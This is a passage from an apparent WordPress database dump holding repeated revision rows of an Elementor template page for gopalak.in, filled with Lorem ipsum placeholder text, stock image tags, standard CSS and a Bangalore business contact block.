mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:33:24','2022-09-30 06:03:24','',1373,'https://gopalak.in/?p=1455',0,'revision','',0),(1456,1,'2022-09-30 11:33:24','2022-09-30 06:03:24','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:33:24','2022-09-30 06:03:24','',1373,'https://gopalak.in/?p=1456',0,'revision','',0),(1457,1,'2022-09-30 11:33:24','2022-09-30 06:03:24','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:33:24','2022-09-30 06:03:24','',1373,'https://gopalak.in/?p=1457',0,'revision','',0),(1458,1,'2022-09-30 11:34:33','2022-09-30 06:04:33','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-30 11:34:33','2022-09-30 06:04:33','',1373,'https://gopalak.in/?p=1458',0,'revision','',0),(1459,1,'2022-09-30 11:34:33','2022-09-30 06:04:33','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.7 - 20-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" 